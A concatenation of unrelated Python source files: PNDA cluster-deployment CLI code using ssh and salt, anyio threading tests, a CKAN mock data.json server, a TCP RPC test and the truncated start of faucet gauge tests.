                    raise Exception("Error %s, timeout after %s minutes. See debug log (%s) for details."
                                    % (action, generic_timeout_minutes, LOG_FILE_NAME))
        if errors is not None:
            self._process_thread_errors(action, errors)

    def _wait_for_host_connectivity(self, hosts, bastion_used, check_func=None):
        '''
        Block until every host answers a trivial ssh command (or the custom
        check_func succeeds), retrying every 2 seconds.
        '''
        wait_threads = []

        def do_wait(host):
            while True:
                try:
                    CONSOLE.info('Checking connectivity to %s', host)
                    if check_func is not None:
                        check_func()
                    else:
                        self._ssh_client.ssh(['ls ~'], host)
                    break
                except:
                    LOG.debug('Still waiting for connectivity to %s.', host)
                    LOG.info(traceback.format_exc())
                    time.sleep(2)

        for host in hosts:
            thread = Thread(target=do_wait, args=[host])
            thread.daemon = True
            wait_threads.append(thread)
        self._wait_on_host_operations('waiting for host connectivity', wait_threads, bastion_used, None)

    def _restart_minions(self, hosts, bastion_used):
        # Restart the salt minion on every host, then give them time to reconnect.
        wait_threads = []

        def do_cmd(host):
            CONSOLE.info('Restarting salt minion on %s', host)
            self._ssh_client.ssh(['sudo service salt-minion restart'], host)

        for host in hosts:
            thread = Thread(target=do_cmd, args=[host])
            thread.daemon = True
            wait_threads.append(thread)
        self._wait_on_host_operations('restarting salt minions', wait_threads, bastion_used, None)
        time.sleep(60)

    def _export_bootstrap_resources(self, cluster, files, commands):
        '''
        Archive the bootstrap files plus a script of the export commands that were
        run, so a bootstrap can be replayed or inspected later.
        '''
        with tarfile.open('cli/logs/%s_%s_bootstrap-resources.tar.gz' % (cluster, MILLI_TIME()), "w:gz") as tar:
            map(tar.add, files)
            command_text = StringIO.StringIO()
            command_text.write('\n'.join([command for command in commands if command.startswith('export')]))
            command_text.seek(0)
            command_info = tarfile.TarInfo(name="cli/additional_exports.sh")
            command_info.size = len(command_text.buf)
            tar.addfile(tarinfo=command_info, fileobj=command_text)

    def _get_minions_to_bootstrap(self):
        # "name ip" lines for every instance that is not yet bootstrapped.
        return ['%s %s' % (instance_name, instance_properties['private_ip_address'])
                for instance_name, instance_properties in self.get_instance_map().iteritems()
                if not instance_properties['bootstrapped']]

    def _get_bastion_ip(self):
        # Public IP of the bastion, or None if there is no bastion / no flavor yet.
        bastion_ip = None
        if self._flavor is not None:
            instance_map = self.get_instance_map()
            bastion = self._node_config['bastion-instance']
            bastion_name = self._cluster + '-' + bastion
            if bastion_name in instance_map.keys():
                bastion_ip = instance_map[self._cluster + '-' + bastion]['ip_address']
        return bastion_ip

    def _install_pnda(self):
        '''
        Full PNDA install: prepare the bastion, bootstrap the saltmaster, bootstrap
        every other node in parallel, then run salt highstate + orchestrate.
        '''
        to_runfile({'cmdline': sys.argv,
                    'bastion': self._node_config['bastion-instance'],
                    'saltmaster': self._node_config['salt-master-instance']})
        instance_map = self.get_instance_map()
        bastion_ip = self._get_bastion_ip()

        CONSOLE.debug('The PNDA console will come up on: http://%s',
                      instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address'])

        def prepare_bastion():
            # Configure the bastion with the PNDA mirror and install nc on it
            # nc is required for relaying commands through the bastion
            # to do anything on the other instances
            files_to_scp = ['cli/pnda_env_%s.sh' % self._cluster,
                            'bootstrap-scripts/package-install.sh']
            cmds_to_run = ['source /tmp/pnda_env_%s.sh' % self._cluster,
                           'export PNDA_CLUSTER=%s' % self._cluster,
                           'export PNDA_FLAVOR=%s' % self._flavor,
                           'sudo chmod a+x /tmp/package-install.sh',
                           'sudo -E /tmp/package-install.sh',
                           'sudo yum install -y nc']
            # The ssh relay is not set up yet, so go direct with scp/ssh subprocesses.
            nc_scp_cmd = "scp -i %s -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null %s %s@%s:%s" % (
                self._keyfile, ' '.join(files_to_scp), self._pnda_env['infrastructure']['OS_USER'], bastion_ip, '/tmp')
            CONSOLE.debug(nc_scp_cmd)
            ret_val = subprocess_to_log.call(nc_scp_cmd.split(' '), LOG, log_id=bastion_ip)
            if ret_val != 0:
                raise Exception("Error transferring files to new host %s via SCP. See debug log (%s) for details."
                                % (bastion_ip, LOG_FILE_NAME))
            nc_ssh_cmd = 'ssh -i %s -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null %s@%s' % (
                self._keyfile, self._pnda_env['infrastructure']['OS_USER'], bastion_ip)
            nc_install_cmd = nc_ssh_cmd.split(' ')
            nc_install_cmd.append(' && '.join(cmds_to_run))
            CONSOLE.debug(nc_install_cmd)
            ret_val = subprocess_to_log.call(nc_install_cmd, LOG, log_id=bastion_ip)
            if ret_val != 0:
                raise Exception("Error running ssh commands on host %s. See debug log (%s) for details." % (
                    bastion_ip, LOG_FILE_NAME))

        if bastion_ip:
            self._wait_for_host_connectivity([bastion_ip], False, prepare_bastion)
        self._wait_for_host_connectivity([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None)
        CONSOLE.info('Bootstrapping saltmaster. Expect this to take a few minutes, check the debug log for progress (%s).', LOG_FILE_NAME)
        saltmaster = instance_map[self._cluster + '-' + self._node_config['salt-master-instance']]
        saltmaster_ip = saltmaster['private_ip_address']

        platform_salt_tarball = None
        if 'PLATFORM_SALT_LOCAL' in self._pnda_env['platform_salt']:
            # Ship a local platform-salt tree instead of cloning from git on the target.
            local_salt_path = self._pnda_env['platform_salt']['PLATFORM_SALT_LOCAL']
            platform_salt_tarball = '%s.tmp' % str(uuid.uuid1())
            with tarfile.open(platform_salt_tarball, mode='w:gz') as archive:
                archive.add(local_salt_path, arcname='platform-salt', recursive=True)
            self._ssh_client.scp([platform_salt_tarball], saltmaster_ip)
            os.remove(platform_salt_tarball)

        platform_certs_tarball = None
        if self._pnda_env['security']['SECURITY_MODE'] != 'disabled':
            platform_certs_tarball = self._ship_certs(saltmaster_ip)

        bootstrap_threads = []
        bootstrap_errors = Queue.Queue()
        bootstrap_files = Queue.Queue()
        bootstrap_commands = Queue.Queue()
        # The saltmaster must be fully bootstrapped before any minion starts.
        self._bootstrap(saltmaster, saltmaster_ip, self._cluster, self._flavor, self._branch,
                        platform_salt_tarball, platform_certs_tarball, bootstrap_errors, bootstrap_files, bootstrap_commands)
        self._process_thread_errors('bootstrapping saltmaster', bootstrap_errors)
        CONSOLE.info('Bootstrapping other instances. Expect this to take a few minutes, check the debug log for progress (%s).', LOG_FILE_NAME)
        for key, instance in instance_map.iteritems():
            if '-' + self._node_config['salt-master-instance'] not in key:
                thread = Thread(target=self._bootstrap,
                                args=[instance, saltmaster_ip, self._cluster, self._flavor, self._branch,
                                      platform_salt_tarball, None, bootstrap_errors, bootstrap_files, bootstrap_commands])
                thread.daemon = True
                bootstrap_threads.append(thread)
        self._wait_on_host_operations('bootstrapping host', bootstrap_threads, bastion_ip is not None, bootstrap_errors)
        self._export_bootstrap_resources(self._cluster, list(set(bootstrap_files.queue)), list(set(bootstrap_commands.queue)))

        time.sleep(30)

        CONSOLE.info('Running salt to install software. Expect this to take 45 minutes or more,'
                     ' check the debug log for progress (%s).', LOG_FILE_NAME)
        # Consul is installed first, before restarting the minion to pick up
        # changes to resolv.conf (see https://github.com/saltstack/salt/issues/21397)
        # We then wait 60 seconds before continuing with highstate to allow the minions to restart
        # An improvement would be running a test.ping and waiting for all expected minions to be ready
        CONSOLE.info('Installing Consul')
        self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" state.sls consul,consul.dns queue=True 2>&1)'
                              ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip)
        CONSOLE.info('Restarting minions')
        self._restart_minions([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None)
        CONSOLE.info('Refreshing salt mines')
        self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" mine.update 2>&1) | tee -a pnda-salt.log; %s'
                              % THROW_BASH_ERROR], saltmaster_ip)
        self._register_services(saltmaster_ip)
        CONSOLE.info('Continuing with installation of PNDA')
        self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*"'
                              ' state.highstate queue=True 2>&1) | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR,
                              '(sudo CLUSTER=%s salt-run --log-level=debug state.orchestrate orchestrate.pnda 2>&1) | tee -a pnda-salt.log; %s'
                              % (self._cluster, THROW_BASH_ERROR)], saltmaster_ip)

    def _register_services(self, saltmaster_ip):
        '''
        Populate the service registry with a record per service, resolving each
        service's role to the hosts carrying it.
        '''
        CONSOLE.info('Populating %s with services', self._service_registry.name)
        # Read descriptor
        service_to_role_descriptor = self._get_service_to_role_descriptor()
        # Find hosts with those roles using grains
        instances = self.get_instance_map()
        affected_hosts = []
        for service in service_to_role_descriptor:
            role = service_to_role_descriptor[service]['role']
            port = service_to_role_descriptor[service]['port']
            hosts_for_role = self._get_hosts_for_role(saltmaster_ip, role)
            # Get the addresses for those hosts. Services named *-internal (or hosts
            # without a public address) are registered on the private address.
            def ip_for_service(name, props):
                return 'private_ip_address' if name.endswith('-internal') or not props['ip_address'] else 'ip_address'
            addresses_for_service = [instances[host][ip_for_service(service, instances[host])] for host in hosts_for_role]
            # Push records into registry mapping service->address
            affected_hosts.extend(hosts_for_role)
            self._service_registry.register_service_record(service, addresses_for_service, port)
        self._service_registry.commit([instances[host]['private_ip_address'] for host in set(affected_hosts)])

    def _get_service_to_role_descriptor(self):
        # Load the static service -> {role, port} mapping shipped with the CLI.
        rts_filepath = 'bootstrap-scripts/service_to_role.json'
        with open(rts_filepath, 'r') as mapping_file:
            mapping_data = json.loads(mapping_file.read())
        return mapping_data

    def _get_hosts_for_role(self, saltmaster_ip, role):
        '''
        Ask the saltmaster which hosts carry the given role, parsing the
        YAML-style "- host" list lines out of the salt-call output.
        '''
        output = []
        self._ssh_client.ssh(['(sudo salt-call pnda.get_hosts_for_role %s 2>&1) | tee -a pnda-salt.log; %s'
                              % (role, THROW_BASH_ERROR)], saltmaster_ip, output)
        hosts_for_role = []
        for line in output:
            if line.strip().startswith('-'):
                hosts_for_role.append(line.strip().split('- ')[1])
        CONSOLE.debug('Hosts for role %s are: %s', role, json.dumps(hosts_for_role))
        return hosts_for_role

    def _expand_pnda(self, do_orchestrate):
        '''
        Bootstrap only the not-yet-bootstrapped instances, then highstate the new
        nodes (plus orchestrate when datanodes were added).
        '''
        instance_map = self.get_instance_map(True)
        bastion_ip = self._get_bastion_ip()
        saltmaster = instance_map[self._cluster + '-' + self._node_config['salt-master-instance']]
        saltmaster_ip = saltmaster['private_ip_address']
        # Regenerate minion keys on the saltmaster for the new nodes.
        self._ssh_client.ssh(['rm -rf /tmp/%s || true' % self._keyfile], saltmaster_ip)
        self._ssh_client.scp([self._keyfile,
                              'cli/pnda_env_%s.sh' % self._cluster,
                              'bootstrap-scripts/saltmaster-gen-keys.sh'], saltmaster_ip)
        self._ssh_client.ssh(['echo \'%s\' | tee /tmp/minions_list' % '\n'.join(self._get_minions_to_bootstrap()),
                              'source /tmp/pnda_env_%s.sh' % self._cluster,
                              'sudo chmod a+x /tmp/saltmaster-gen-keys.sh',
                              'sudo -E /tmp/saltmaster-gen-keys.sh'], saltmaster_ip)
        self._wait_for_host_connectivity([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None)
        CONSOLE.info('Bootstrapping new instances. Expect this to take a few minutes, check the debug log for progress. (%s)', LOG_FILE_NAME)
        bootstrap_threads = []
        bootstrap_errors = Queue.Queue()
        for _, instance in instance_map.iteritems():
            if instance['node_type'] and not instance['bootstrapped']:
                thread = Thread(target=self._bootstrap,
                                args=[instance, saltmaster_ip, self._cluster, self._flavor,
                                      self._branch, None, None, bootstrap_errors])
                bootstrap_threads.append(thread)
                thread.daemon = True
        self._wait_on_host_operations('bootstrapping host', bootstrap_threads, bastion_ip is not None, bootstrap_errors)

        time.sleep(30)

        CONSOLE.info('Running salt to install software. Expect this to take 10 - 20 minutes, check the debug log for progress. (%s)', LOG_FILE_NAME)
        # Consul is installed first, before restarting the minion to pick up
        # changes to resolv.conf (see https://github.com/saltstack/salt/issues/21397)
        # We then wait 60 seconds before continuing with highstate to allow the minions to restart
        # An improvement would be running a test.ping and waiting for all expected minions to be ready
        CONSOLE.info('Installing Consul')
        self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed'
                              ' -C "G@pnda:is_new_node" state.sls consul,consul.dns queue=True 2>&1)'
                              ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip)
        CONSOLE.info('Restarting minions')
        self._restart_minions([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None)
        CONSOLE.info('Refreshing salt mines')
        self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" mine.update 2>&1) | tee -a pnda-salt.log; %s'
                              % THROW_BASH_ERROR], saltmaster_ip)
        # BUG FIX: this previously called self._register_public_services(), a method
        # that does not exist on this class, causing an AttributeError on expand.
        self._register_services(saltmaster_ip)
        CONSOLE.info('Continuing with installation of PNDA')
        expand_commands = ['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed -C "G@pnda:is_new_node" state.highstate queue=True 2>&1)'
                           + ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR]
        if do_orchestrate:
            CONSOLE.info('Including orchestrate because new Hadoop datanodes are being added')
            expand_commands.append('(sudo CLUSTER=%s salt-run --log-level=debug state.orchestrate orchestrate.pnda-expand 2>&1)' % self._cluster
                                   + ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR)
        self._ssh_client.ssh(expand_commands, saltmaster_ip)

    def _destroy_pnda(self):
        # Remove the per-cluster helper scripts generated on the client side.
        CONSOLE.info('Removing ssh access scripts')
        socks_proxy_file = 'cli/socks_proxy-%s' % self._cluster
        if os.path.exists(socks_proxy_file):
            os.remove(socks_proxy_file)
        ssh_config_file = 'cli/ssh_config-%s' % self._cluster
        if os.path.exists(ssh_config_file):
            os.remove(ssh_config_file)
        env_sh_file = 'cli/pnda_env_%s.sh' % self._cluster
        if os.path.exists(env_sh_file):
            os.remove(env_sh_file)

    def _check_hosts_bootstrapped(self, instances, bastion_used):
        '''
        Set instances[key]['bootstrapped'] = True for every host where the
        ~/.bootstrap_complete marker file exists.
        '''
        check_threads = []
        check_results = Queue.Queue()

        def do_check(host_key, host, check_results):
            try:
                CONSOLE.info('Checking bootstrap status for %s', host)
                self._ssh_client.ssh(['ls ~/.bootstrap_complete'], host)
                CONSOLE.debug('Host is bootstrapped: %s.', host)
                check_results.put(host_key)
            except:
                # A failed ls (or unreachable host) means "not bootstrapped".
                CONSOLE.debug('Host is not bootstrapped: %s.', host)

        for key, instance in instances.iteritems():
            thread = Thread(target=do_check, args=[key, instance['private_ip_address'], check_results])
            thread.daemon = True
            check_threads.append(thread)
        self._wait_on_host_operations('checking bootstrap status', check_threads, bastion_used, None)
        while not check_results.empty():
            host_key = check_results.get()
            instances[host_key]['bootstrapped'] = True

    def _check_config(self, keyfile):
        # Pre-flight validation; each check exits the process on failure.
        self._check_private_key_exists(keyfile)
        self._check_pnda_mirror()
        self.check_target_specific_config()

    def _check_private_key_exists(self, keyfile):
        if not os.path.isfile(keyfile):
            CONSOLE.info('Keyfile.......... ERROR')
            CONSOLE.error('Did not find local file named %s', keyfile)
            sys.exit(1)
        CONSOLE.info('Keyfile.......... OK')

    def _check_pnda_mirror(self):
        def raise_error(reason):
            CONSOLE.info('PNDA mirror...... ERROR')
            CONSOLE.error(reason)
            CONSOLE.error(traceback.format_exc())
            sys.exit(1)

        try:
            mirror = self._pnda_env['mirrors']['PNDA_MIRROR']
            response = requests.head(mirror)
            # expect 200 (open mirror) 403 (no listing allowed)
            # or any redirect (in case of proxy/redirect)
            if response.status_code not in [200, 403, 301, 302, 303, 307, 308]:
                raise_error("PNDA mirror configured and present "
                            "but responded with unexpected status code (%s). " % response.status_code)
            CONSOLE.info('PNDA mirror...... OK')
        except KeyError:
            raise_error('PNDA mirror was not defined in pnda_env.yaml')
        except:
            raise_error("Failed to connect to PNDA mirror. Verify connection "
                        "to %s, check mirror in pnda_env.yaml and try again." % mirror)
test_threads.py
"""Tests for anyio's worker-thread and blocking-portal integration."""
import asyncio
import sys
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress

import pytest

from anyio import (
    create_blocking_portal, create_capacity_limiter, create_event, create_task_group,
    run_async_from_thread, run_sync_in_worker_thread, sleep, start_blocking_portal,
    wait_all_tasks_blocked)

# asyncio.Task.current_task() was removed in Python 3.9; select the available API.
if sys.version_info < (3, 9):
    current_task = asyncio.Task.current_task
else:
    current_task = asyncio.current_task

pytestmark = pytest.mark.anyio


async def test_run_async_from_thread():
    # A coroutine scheduled through run_async_from_thread must execute on the
    # event loop thread, while the worker callable runs on a different thread.
    async def add(a, b):
        assert threading.get_ident() == event_loop_thread_id
        return a + b

    def worker(a, b):
        assert threading.get_ident() != event_loop_thread_id
        return run_async_from_thread(add, a, b)

    event_loop_thread_id = threading.get_ident()
    result = await run_sync_in_worker_thread(worker, 1, 2)
    assert result == 3


async def test_run_anyio_async_func_from_thread():
    # anyio's own async functions (here: sleep) must be callable from a worker thread.
    def worker(*args):
        run_async_from_thread(sleep, *args)
        return True

    assert await run_sync_in_worker_thread(worker, 0)


async def test_run_in_thread_cancelled():
    # Cancelling before the worker thread ever starts: the thread body (state=2)
    # and the post-await line (state=3) must both be skipped, so state stays 1.
    def thread_worker():
        nonlocal state
        state = 2

    async def worker():
        nonlocal state
        state = 1
        await run_sync_in_worker_thread(thread_worker)
        state = 3

    state = 0
    async with create_task_group() as tg:
        await tg.spawn(worker)
        await tg.cancel_scope.cancel()

    assert state == 1


async def test_run_in_thread_exception():
    # An exception raised in the worker thread propagates to the awaiting task.
    def thread_worker():
        raise ValueError('foo')

    with pytest.raises(ValueError) as exc:
        await run_sync_in_worker_thread(thread_worker)

    exc.match('^foo$')


async def test_run_in_custom_limiter():
    # With a capacity limiter of 3 and 4 tasks, at most 3 threads may run at once.
    def thread_worker():
        nonlocal num_active_threads, max_active_threads
        num_active_threads += 1
        max_active_threads = max(num_active_threads, max_active_threads)
        event.wait(1)
        num_active_threads -= 1

    async def task_worker():
        await run_sync_in_worker_thread(thread_worker, limiter=limiter)

    event = threading.Event()
    num_active_threads = max_active_threads = 0
    limiter = create_capacity_limiter(3)
    async with create_task_group() as tg:
        for _ in range(4):
            await tg.spawn(task_worker)

        await sleep(0.1)
        assert num_active_threads == 3
        assert limiter.borrowed_tokens == 3
        event.set()

    assert num_active_threads == 0
    assert max_active_threads == 3


def test_run_async_from_unclaimed_thread():
    # Calling run_async_from_thread outside an anyio worker thread must fail fast.
    async def foo():
        pass

    exc = pytest.raises(RuntimeError, run_async_from_thread, foo)
    exc.match('This function can only be run from an AnyIO worker thread')


@pytest.mark.parametrize('cancellable, expected_last_active', [
    (False, 'task'),
    (True, 'thread')
], ids=['uncancellable', 'cancellable'])
async def test_cancel_worker_thread(cancellable, expected_last_active):
    """
    Test that when a task running a worker thread is cancelled, the cancellation is not acted
    on until the thread finishes.

    """
    def thread_worker():
        nonlocal last_active
        run_async_from_thread(sleep_event.set)
        time.sleep(0.2)
        last_active = 'thread'
        run_async_from_thread(finish_event.set)

    async def task_worker():
        nonlocal last_active
        try:
            await run_sync_in_worker_thread(thread_worker, cancellable=cancellable)
        finally:
            last_active = 'task'

    sleep_event = create_event()
    finish_event = create_event()
    last_active = None
    async with create_task_group() as tg:
        await tg.spawn(task_worker)
        await sleep_event.wait()
        await tg.cancel_scope.cancel()

    # Which side ran last depends on whether the thread call was cancellable.
    await finish_event.wait()
    assert last_active == expected_last_active


@pytest.mark.parametrize('anyio_backend', ['asyncio'])
async def test_cancel_asyncio_native_task():
    # A native asyncio cancel of the task must abort a cancellable worker-thread call.
    async def run_in_thread():
        nonlocal task
        task = current_task()
        await run_sync_in_worker_thread(time.sleep, 1, cancellable=True)

    task = None
    async with create_task_group() as tg:
        await tg.spawn(run_in_thread)
        await wait_all_tasks_blocked()
        task.cancel()


class TestBlockingPortal:
    async def test_successful_call(self):
        # Both sync and async callables submitted via the portal must run on the
        # event loop thread, not on the external thread.
        async def async_get_thread_id():
            return threading.get_ident()

        def external_thread():
            thread_ids.append(portal.call(threading.get_ident))
            thread_ids.append(portal.call(async_get_thread_id))

        thread_ids = []
        async with create_blocking_portal() as portal:
            thread = threading.Thread(target=external_thread)
            thread.start()
            await run_sync_in_worker_thread(thread.join)

        for thread_id in thread_ids:
            assert thread_id == threading.get_ident()

    async def test_aexit_with_exception(self):
        """Test that when the portal exits with an exception, all tasks are cancelled."""
        def external_thread():
            try:
                portal.call(sleep, 3)
            except BaseException as exc:
                results.append(exc)
            else:
                results.append(None)

        results = []
        with suppress(Exception):
            async with create_blocking_portal() as portal:
                thread1 = threading.Thread(target=external_thread)
                thread1.start()
                thread2 = threading.Thread(target=external_thread)
                thread2.start()
                await sleep(0.1)
                assert not results
                raise Exception

        await run_sync_in_worker_thread(thread1.join)
        await run_sync_in_worker_thread(thread2.join)

        # Both in-flight portal calls must have been cancelled by the exception exit.
        assert len(results) == 2
        assert isinstance(results[0], CancelledError)
        assert isinstance(results[1], CancelledError)

    async def test_aexit_without_exception(self):
        """Test that when the portal exits, it waits for all tasks to finish."""
        def external_thread():
            try:
                portal.call(sleep, 0.2)
            except BaseException as exc:
                results.append(exc)
            else:
                results.append(None)

        results = []
        async with create_blocking_portal() as portal:
            thread1 = threading.Thread(target=external_thread)
            thread1.start()
            thread2 = threading.Thread(target=external_thread)
            thread2.start()
            await sleep(0.1)
            assert not results

        await run_sync_in_worker_thread(thread1.join)
        await run_sync_in_worker_thread(thread2.join)

        # Clean exit: both calls completed normally rather than being cancelled.
        assert results == [None, None]

    async def test_call_portal_from_event_loop_thread(self):
        # portal.call() would deadlock on the event loop thread, so it must raise.
        async with create_blocking_portal() as portal:
            exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
            exc.match('This method cannot be called from the event loop thread')

    # NOTE(review): the ids look swapped relative to the parameter values
    # (False -> 'contextmanager', True -> 'startstop') — confirm intent upstream.
    @pytest.mark.parametrize('use_contextmanager', [False, True], ids=['contextmanager', 'startstop'])
    def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options,
                                       use_contextmanager):
        # The portal runs its own event loop in a separate thread.
        async def async_get_thread_id():
            return threading.get_ident()

        if use_contextmanager:
            with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
                thread_id = portal.call(async_get_thread_id)
        else:
            portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
            try:
                thread_id = portal.call(async_get_thread_id)
            finally:
                portal.call(portal.stop)

        assert isinstance(thread_id, int)
        assert thread_id != threading.get_ident()

    def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options):
        # Calls after stop() must be rejected.
        portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
        portal.call(portal.stop)
        pytest.raises(RuntimeError, portal.call, threading.get_ident).\
            match('This portal is not running')
mock_datajson_source.py
from __future__ import print_function
import json
import logging
import os
import SimpleHTTPServer
import SocketServer
from threading import Thread

import pkg_resources

from ckanext import datajson

log = logging.getLogger("harvester")


class MockDataJSONHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """HTTP handler that serves canned data.json documents for harvester tests.

    The first path component selects the test scenario; its value is recorded
    in ``self.test_name`` and a matching sample file (if any) is returned.
    """

    # Request path -> (sample file under datajson-samples/, test name).
    SAMPLE_ROUTES = {
        '/arm': ('arm.data.json', 'arm'),
        '/usda': ('usda.gov.data.json', 'usda'),
        '/ny': ('ny.data.json', 'ny'),
        '/collection-1-parent-2-children.data.json': (
            'collection-1-parent-2-children.data.json',
            'collection-1-parent-2-children.data.json'),
        '/collection-2-parent-4-children.data.json': (
            'collection-2-parent-4-children.data.json',
            'collection-2-parent-4-children.data.json'),
        '/error-reserved-title': ('reserved-title.data.json', 'error-reserved-title'),
        '/error-large-spatial': ('large-spatial.data.json', 'error-large-spatial'),
        '/null-spatial': ('null-spatial.data.json', 'null-spatial'),
    }

    def do_GET(self):
        """Serve a sample data.json, a canned error, or 400 for unknown paths."""
        log.info('GET mock at: {}'.format(self.path))

        # The test name is the first bit of the URL and makes CKAN behave
        # differently in some way. Its value is recorded for assertions.
        self.test_name = None
        self.sample_datajson_file = None

        route = self.SAMPLE_ROUTES.get(self.path)
        if route is not None:
            self.sample_datajson_file, self.test_name = route
        elif self.path == '/404':
            self.test_name = 'e404'
            self.respond('Not found', status=404)
        elif self.path == '/500':
            self.test_name = 'e500'
            self.respond('Error', status=500)

        if self.sample_datajson_file is not None:
            log.info('return json file {}'.format(self.sample_datajson_file))
            self.respond_json_sample_file(file_path=self.sample_datajson_file)

        if self.test_name is None:
            self.respond('Mock DataJSON doesnt recognize that call', status=400)

    def respond_json(self, content_dict, status=200):
        """Respond with *content_dict* serialized as JSON."""
        return self.respond(json.dumps(content_dict), status=status,
                            content_type='application/json')

    def respond_json_sample_file(self, file_path, status=200):
        """Respond with the contents of a packaged sample data.json file."""
        pt = pkg_resources.resource_filename(
            __name__, "/datajson-samples/{}".format(file_path))
        # Close the sample file deterministically (the handle was previously
        # leaked: open() without a matching close()).
        with open(pt, 'r') as data:
            content = data.read()
        log.info('mock respond {}'.format(content[:90]))
        return self.respond(content=content, status=status,
                            content_type='application/json')

    def respond(self, content, status=200, content_type='application/json'):
        """Write an HTTP response with the given status, content type and body."""
        self.send_response(status)
        self.send_header('Content-Type', content_type)
        self.end_headers()
        self.wfile.write(content)
        # NOTE(review): closing wfile here pre-empts the base handler's own
        # cleanup; kept as-is because the tests rely on the connection closing.
        self.wfile.close()


def serve(port=8998):
    '''Runs a CKAN-alike app (over HTTP) that is used for harvesting tests'''

    class TestServer(SocketServer.TCPServer):
        # Allow quick restarts in tests without 'address already in use'.
        allow_reuse_address = True

    httpd = TestServer(("", port), MockDataJSONHandler)
    info = 'Serving test HTTP server at port {}'.format(port)
    log.info(info)
    # Daemon thread so the test process can exit without an explicit shutdown.
    httpd_thread = Thread(target=httpd.serve_forever)
    httpd_thread.setDaemon(True)
    httpd_thread.start()
test_threads.py
import socket
import threading

import serdes
import server
from helpers import PlainRPCClient


class TCPRPCServer(server.SimpleRPCServer):
    """RPC server that accepts one TCP connection and feeds received bytes
    into the SimpleRPCServer machinery."""

    def __init__(self):
        super(TCPRPCServer, self).__init__(self.my_send)
        self.sock = None
        self.conn = None
        self.t = threading.Thread(target=self.run)
        self.t.daemon = True  # to avoid the hassle of server graceful shutdown

    def my_send(self, msg):
        """Send raw bytes to the connected peer."""
        self.conn.sendall(msg)

    def open(self, host, port):
        """Bind, listen, and start the acceptor/reader thread."""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.t.start()

    def run(self):
        """Accept a single connection and pump received chunks into the RPC layer."""
        self.conn, addr = self.sock.accept()
        print('Connected by', addr)
        while True:
            chunk = self.conn.recv(2048)
            # recv returns an empty bytes object when the peer closes;
            # the previous `chunk == ''` comparison never matched byte
            # sockets on Python 3, so a closed connection spun forever.
            if not chunk:
                raise RuntimeError("socket connection broken")
            self.received_data(chunk)


class TCPRPCClient(PlainRPCClient):
    """RPC client that ships msgpack-serialized messages over TCP."""

    def __init__(self):
        super(TCPRPCClient, self).__init__(self.my_send, self.my_receive)
        self.serdes = serdes.SerDesMsgpack()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def connect(self, host, port):
        self.sock.connect((host, port))

    def my_send(self, msg):
        self.sock.sendall(self.serdes.serialize(msg))

    def my_receive(self):
        """Receive one chunk and deserialize it into a message."""
        while True:
            chunk = self.sock.recv(2048)
            # Same empty-read fix as the server side (see TCPRPCServer.run).
            if not chunk:
                raise RuntimeError("socket connection broken")
            return self.serdes.deserialize(chunk)


def test_tcp(tester):
    """Wire a TCP server/client pair together and hand them to *tester*."""
    # Renamed from `server` to avoid shadowing the imported `server` module.
    rpc_server = TCPRPCServer()
    client = TCPRPCClient()
    rpc_server.open('localhost', 5000)
    client.connect('localhost', 5000)

    def shutdown():
        # FIXME: close the server socket
        pass

    tester(rpc_server, client.call, shutdown)
test_gauge.py
"""Unit tests for gauge""" from collections import namedtuple import random import re import shutil import tempfile import threading import time import os import unittest from unittest import mock from http.server import HTTPServer, BaseHTTPRequestHandler import yaml import requests from requests.exceptions import ReadTimeout from ryu.controller.ofp_event import EventOFPMsgBase from ryu.lib import type_desc from ryu.lib import hub from ryu.ofproto import ofproto_v1_3 as ofproto from ryu.ofproto import ofproto_v1_3_parser as parser from prometheus_client import CollectorRegistry from faucet import gauge, gauge_prom, gauge_influx, gauge_pollers, watcher, valve_util class QuietHandler(BaseHTTPRequestHandler): """Don't log requests.""" def log_message(self, _format, *_args): pass def create_mock_datapath(num_ports): """Mock a datapath by creating mocked datapath ports.""" dp_id = random.randint(1, 5000) dp_name = mock.PropertyMock(return_value='datapath') def table_by_id(i): table = mock.Mock() table_name = mock.PropertyMock(return_value='table' + str(i)) type(table).name = table_name return table def port_labels(port_no): return { 'port': 'port%u' % port_no, 'port_description': 'port%u' % port_no, 'dp_id': hex(dp_id), 'dp_name': dp_name} ports = {} for i in range(1, num_ports + 1): port = mock.Mock() port_name = mock.PropertyMock(return_value='port' + str(i)) type(port).name = port_name ports[i] = port datapath = mock.Mock(ports=ports, dp_id=dp_id, port_labels=port_labels, table_by_id=table_by_id) type(datapath).name = dp_name return datapath def start_server(handler): """ Starts a HTTPServer and runs it as a daemon thread """ server = HTTPServer(('', 0), handler) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() return server def port_state_msg(datapath, port_num, reason, status=0): """ Create an OFPPortStatus message with random values. 
